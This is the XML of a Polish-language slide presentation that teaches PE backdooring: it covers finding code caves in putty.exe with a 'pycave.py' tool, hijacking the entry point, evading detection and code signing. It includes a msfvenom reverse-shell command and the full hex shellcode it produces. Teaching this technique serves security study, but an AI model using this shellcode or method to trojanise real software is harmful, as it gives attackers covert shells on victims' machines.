                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5376CC-2EF4-AD4B-BE33-4C894E46480A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592285" y="1724238"/>
            <a:ext cx="4582886" cy="702665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="18E7C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DOS stub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="NT headers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FEB0780-3914-5CA7-AD43-93F9F53CD575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601710" y="2546998"/>
            <a:ext cx="4573153" cy="1353042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2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NT headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="File Header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80C701F-4E7C-C04B-1314-DEC2CECEB4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294824" y="3240194"/>
            <a:ext cx="1276661" cy="550344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0076B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2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File Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="PE signature">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A486E47A-00DC-7EF2-37CC-5010A64B1EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782779" y="3235490"/>
            <a:ext cx="1320308" cy="569160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0076B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PE signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Optional Header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4A864E-E92E-C546-6AAF-8CC729940723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763222" y="3235490"/>
            <a:ext cx="1287573" cy="555048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0076BA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17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Optional Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Section Table">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C26A521-D688-6CCB-44C7-91689493670E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601710" y="4014393"/>
            <a:ext cx="4582886" cy="719133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED8200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Section Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DFE205-1750-CDE0-B02A-A404EDDBCED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606576" y="4867411"/>
            <a:ext cx="4573153" cy="1462159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="535353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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="825500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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Section 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6C183A-6643-0AA6-44DE-BC41C340F81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766871" y="5027340"/>
            <a:ext cx="4233714" cy="3382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.text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ection 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BAB3E09-42C6-5A49-3B68-3E33EB68A8E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766871" y="5440225"/>
            <a:ext cx="4233714" cy="3382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ection n">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05D9BBE-3DCC-1A4D-2081-24DDF5C42570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766871" y="5853110"/>
            <a:ext cx="4233714" cy="33826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>
            <a:lvl1pPr algn="ctr"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68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3D54CA7C-6BDA-4085-DAC7-34DCE8486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1224647"/>
            <a:ext cx="7421011" cy="1619476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4B97E13D-F801-14D4-D13B-A6508684C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91" y="3429000"/>
            <a:ext cx="10498015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6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ole tekstowe 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EFBF57-540D-9B0D-20C7-0A64120C2161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051134" y="2090172"/>
            <a:ext cx="291721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push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mov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eip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add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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, offset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jump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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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85E8AC8-12FB-B30B-EFEB-86E7AAA32743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="318407"/>
            <a:ext cx="1162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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196518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E3C88-8DDE-69D1-1CC4-1F19EC9253FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2139462" y="2598615"/>
            <a:ext cx="791307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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DZIĘKUJEMY ZA UWAGĘ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26566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2530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CODE CAVES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Grupa 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506FCEEF-2A4C-FDE3-2F13-5C3B8A068421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367393" y="1420585"/>
            <a:ext cx="3290977" cy="3055152"/>
            <a:chOff x="367393" y="1420585"/>
            <a:chExt cx="3290977" cy="3055152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="pole tekstowe 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{191AA2DC-C854-4852-3868-8366B10C762C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="367393" y="1420585"/>
              <a:ext cx="1082348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004EDB1D</a:t>
              </a:r>
            </a:p>
            <a:p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004EDB1E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004EDB25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004EDB27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004EDB29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004EDB2B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004EDB2D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004EDB2F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004EDB31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004EDB33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004EDB35</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>004EDB36</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Łącznik prosty 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E359E3-C88C-88B4-1955-E5678B9E0EE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1433412" y="1518558"/>
              <a:ext cx="0" cy="284117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A091E54E-7E81-AA96-2AC4-B762FC4DEDEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1678341" y="1428749"/>
              <a:ext cx="1980029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CC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C0B0 CCCCF888 80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0000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="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</a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>0F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84CC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CC</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>CC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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CC97330-836A-D376-2A9F-D1C0A0507DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4928167" y="1967861"/>
            <a:ext cx="7023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dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> python.exe pycave.py --size 400 --file ..\putty.exe\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D0E13F7-6B93-5CE2-C719-01774F7485F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4928167" y="2337193"/>
            <a:ext cx="68964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Minimum code cave size: 400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Image Base:  0x00400000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Loading "..\putty.exe"...</a:t>
            </a:r>
          </a:p>
          <a:p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Looking for code caves...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699 bytes   RA: 0x000EC4D6  VA: 0x004F32D6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4010 bytes  RA: 0x000EC810  VA: 0x004F3610</a:t>
            </a:r>
          </a:p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4027 bytes  RA: 0x000ED8C0  VA: 0x004F46C0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FEB2AB68-046E-9D46-682B-BAE866CBEDFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="4457702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Size: 13 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68009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SHELLCODE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CC97330-836A-D376-2A9F-D1C0A0507DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665983" y="1757048"/>
            <a:ext cx="7439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msfvenom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 -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LHOST=127.0.0.1 LPORT=4444 -f hex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D0E13F7-6B93-5CE2-C719-01774F7485F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665983" y="2138900"/>
            <a:ext cx="7258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fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a05687f000001680200115c89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5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285C21B-0B6C-74B7-C325-7109430C88BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665983" y="1233828"/>
            <a:ext cx="2809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METASPLOIT PAYLOAD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224BDD60-E9BA-6C48-7E01-E118E95E850A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="1233828"/>
            <a:ext cx="3905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jak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>najmniejszy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relokowalny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natywny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>
                <a:srgbClr val="FF0000"/>
              </a:buClr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CD42D8C-7262-7E08-D419-3BA72045F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62" y="4281265"/>
            <a:ext cx="5820587" cy="1086002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8DFBF96-B83F-AF04-F81B-D7307E0ED2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665983" y="3758045"/>
            <a:ext cx="2193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DETECTION RATE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14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313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WYBÓR PLIKU PE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D6631C5-15A2-9C5A-16C1-83FD372DC501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388218" y="1405278"/>
            <a:ext cx="39052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generyczność</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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występowanie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code caves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potencjał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social engineering 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mały</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rozmiar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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/>
              <a:t>native binary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łączność</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by design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E46BBCF9-6D1B-2189-05BE-6702AADC8A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4" r="784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293468" y="1405278"/>
            <a:ext cx="3340966" cy="3262429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CEC8F976-DB19-032E-C7F3-3154F23C4B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203661" y="1035946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putty v0.77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1A1BC0B3-F92D-94CD-9A8A-FD6096EFE4FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7988461" y="98887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analysis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F10AF4A-3F41-1715-BE82-CDA4AB59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045" y="1358208"/>
            <a:ext cx="3768536" cy="4141584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C06C5C48-9C61-9DB5-C5DB-E6B7E5779997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8089045" y="5499792"/>
            <a:ext cx="153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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CFF EXPLORER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20410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0D2423B-1EFE-46B5-BEF8-8BFF1DCAE7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4183380" y="2810462"/>
            <a:ext cx="30099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PE  BACKDOORING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01DEEBF7-C633-F79E-ABFC-74FE9EC1CA6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237021" y="2188042"/>
            <a:ext cx="2956259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F147AA5-95EA-C289-3B98-EF5ED9FD1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4569644" y="1844081"/>
            <a:ext cx="2291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execution flow hijacked</a:t>
            </a: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C52D9F5-6FB9-7BCE-6FA2-D809249E0112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1978638">
            <a:off x="3701084" y="3878262"/>
            <a:ext cx="295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back to normal execution flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Owal 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA3E6C4-9F5F-5CC7-E057-DE53AAFF7E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2579679" y="1560215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ENTRY POINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Owal 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C700BD-30B8-51B5-E2DD-ACD5EC093D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193280" y="1560215"/>
            <a:ext cx="1975125" cy="19751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CODE CAVE WITH SHELLCODE</a:t>
            </a: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F853C08A-E232-02DB-5391-5663D2A09E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457550" y="4377981"/>
            <a:ext cx="1657342" cy="16573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REGULAR EXECUTION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FC208863-127C-DBE4-98CC-178CB3ED2D1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3408350" y="3217557"/>
            <a:ext cx="3049200" cy="197928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64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2" grpId="0" animBg="1"/>
      <p:bldP spid="12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318407"/>
            <a:ext cx="3441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WYBÓR PLIKU PE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F21E3EE6-878E-9721-909C-F236558EAD8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="841627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CODE SIGNING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FD01651-A325-DDB4-30C9-8C0052DA5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734" y="1364847"/>
            <a:ext cx="3810532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6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0E73ABE-1A1F-9D3D-2D17-D4E207CF4013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="293915"/>
            <a:ext cx="3383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MODYFIKACJA PE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9DB1FBA-CD18-53F8-D419-B21B1A60777D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106136" y="1241094"/>
            <a:ext cx="5054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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> python pycave.py --size 400 --file ..\putty.exe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B947548-43E6-9E62-D695-A8E38296ADF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106136" y="1548871"/>
            <a:ext cx="80361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Minimum code cave size: 400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Image Base:  0x00400000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Loading "..\putty.exe"...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Looking for code caves...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ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>699 bytes  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RA: 0x000EC4D6  VA: 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ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x004F32D6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4010 bytes  RA: 0x000EC810  VA: 0x004F3610</a:t>
            </a:r>
          </a:p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[+] Code cave found in .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rsrc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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Size: 4027 bytes  RA: 0x000ED8C0  VA: 0x004F46C0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FD61322D-8F63-C2B1-0D01-566D58C1B2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253093" y="3304282"/>
            <a:ext cx="1107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SEKCJE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9B05060A-F4C9-8A1B-AA55-E228F0047043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8124328" y="34581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FLAGI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F3CFBF8-F976-473A-2624-AD660A94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6" y="3924134"/>
            <a:ext cx="7772711" cy="207661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9BA6876B-7102-93F3-A996-E61F705CC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328" y="3924134"/>
            <a:ext cx="3869561" cy="1185053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F948E22-B20F-C2AC-A3A3-03A4ED194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310" y="3920919"/>
            <a:ext cx="3971188" cy="1185053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Prostokąt 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533428D5-906C-A9F5-0EFF-6D6360A071BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253093" y="5472694"/>
            <a:ext cx="7494813" cy="220437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED1B24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23" grpId="0" animBg="1"/>
    </p:bld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4782</TotalTime>
  <Words>1809</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>297</Paragraphs>
  <Slides>32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Motyw pakietu Office</vt:lpstr>
      <vt:lpstr>NAJCIEMNIEJ W JASKINI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Dell</dc:creator>
  <cp:lastModifiedBy>Marzena Wróbel</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-04T09:58:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-17T21:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>